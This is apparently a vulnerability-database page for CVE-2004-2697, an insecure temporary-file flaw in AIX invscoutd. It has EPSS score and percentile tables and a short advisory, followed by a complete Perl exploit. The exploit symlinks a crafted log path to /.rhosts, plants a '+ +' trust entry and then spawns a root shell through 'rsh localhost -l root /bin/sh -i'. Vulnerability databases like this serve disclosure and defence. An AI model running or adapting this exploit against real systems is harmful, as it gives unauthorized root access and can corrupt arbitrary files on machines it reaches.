CVE-2004-2697 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.92%	–	–
2022-02-13	–	–	1.92%	–	–
2022-04-03	–	–	1.92%	–	–
2022-06-26	–	–	1.92%	–	–
2022-11-13	–	–	1.92%	–	–
2022-11-20	–	–	1.92%	–	–
2022-12-11	–	–	1.92%	–	–
2022-12-18	–	–	1.92%	–	–
2022-12-25	–	–	1.92%	–	–
2023-01-01	–	–	1.92%	–	–
2023-02-12	–	–	1.92%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.31%
2025-03-30	–	–	–	–	0.31%
2025-04-15	–	–	–	–	0.31%
2025-04-22	–	–	–	–	0.31%
2025-04-22	–	–	–	–	0.31,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	55%
2022-02-13	56%
2022-04-03	76%
2022-06-26	77%
2022-11-13	78%
2022-11-20	77%
2022-12-11	78%
2022-12-18	77%
2022-12-25	78%
2023-01-01	77%
2023-02-12	78%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	52%
2025-03-30	51%
2025-04-15	53%
2025-04-22	54%
2025-04-22	54%

source: https://www.securityfocus.com/bid/9982/info Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges. This issue may allow a malicious user to corrupt arbitrary files on the affected system, potentially leading to a system wide denial of service condition. It has also been conjectured that this issue may be leveraged to allow an attacker to gain escalated privileges, although this is unconfirmed. #!/usr/bin/perl # FileName: x_invscoutd.pl # Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell. # Tested : on Aix4.3.3 & Aix5.1. # Some high version of invscoutd is not affected. # Author : watercloud@xfocus.org # Site : www.xfocus.org www.xfocus.net # Date : 2003-5-29 # Announce: use as your owner risk! $LOG="/tmp/.ex/.hello\n+ +\nworld"; $CMD="/usr/sbin/invscoutd"; umask 022; mkdir "/tmp/.ex",0777; print "Exploit error on kill process invscoutd !!" ,exit 1 if &killproc() == 0; symlink "/.rhosts",$LOG; system $CMD,"-p7321",$LOG; &killproc(); unlink $LOG; print "\n============\nRemember to remove /.rhosts !!\n"; print "rsh localhost -l root '/bin/sh -i'\n"; print "waiting . . . . . .\n"; system "rsh","localhost","-l","root","/bin/sh -i"; system $CMD,"-p808","/dev/null" ; &killproc(); rmdir "/tmp/.ex"; sub killproc() { $_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`; @proc_lst=split; $ret=kill 9,$proc_lst[1] if $proc_lst[1]; $ret=-1 if ! defined $ret; return $ret; } #EOF